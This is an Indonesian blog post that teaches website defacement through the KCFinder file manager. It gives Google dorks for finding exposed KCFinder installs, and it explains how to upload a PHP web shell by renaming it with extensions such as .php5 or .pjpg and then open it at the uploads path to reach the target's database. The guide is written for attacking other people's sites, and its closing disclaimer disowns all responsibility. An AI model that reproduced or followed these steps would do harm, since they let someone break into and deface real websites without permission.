Cara deface menggunakan teknik kcfinder upload shell

pada pertemmuan kali ini saya akan memberikan tutorial cara deface mengguanakan teknik kcfinder, ini merupakan teknik deface pertama saya karna teknik ini adalah teknik deface paling mudah untuk di lakukan. baiklah kita langsung saja ke tutorialnya…

pertama kita siapkan dulu dorknya

inurl:/kcfinder
inurl:/kcfinder site:(isi nama domain)
inurl:/ckeditor/kcfinder
inurl:/modules/
inurl:/plugins

pilih salah satu, jan lupa kembangin sendiri biar joss

cari targetnya, setelah dapat targetnya langsung saja exploit  http://site.co.li/path/kcfinder/browse.php

setelah muncul seperti itu, baru olah anda upload shell kesayangan anda, shel bisa berformat .php.xxxjpg, .php,.pjpg, .php5 atau juga yang lainya

setelah upload shell barulah kita panggil shell kita dengan http://site.co.li/path/kcfinder/upload/files/namashellmu

dan tara…. kita sudah masuk kedalam daabase target, mau diapakan terselah kalian yang penting kamu bahagia…
sekian tutorial dari saya, jangan di salah gunakan, saya tidak akan bertanggung jawab atas apa yang terjadi setelah ini, resiko di tanggung pemenang..

Leave a Comment